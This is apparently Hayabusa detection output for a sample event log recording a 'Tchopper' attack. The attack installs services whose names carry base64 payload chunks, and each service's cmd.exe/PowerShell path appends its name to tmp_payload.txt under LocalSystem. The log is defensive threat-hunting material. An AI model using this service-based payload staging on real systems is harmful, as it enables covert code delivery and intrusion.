start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious 
Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:23.680 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:38.333 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICANCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJPcGVyYXRpb24gY2FuY2VsbGVkIGJ5IHVzZXIiDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclsw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:38.333 
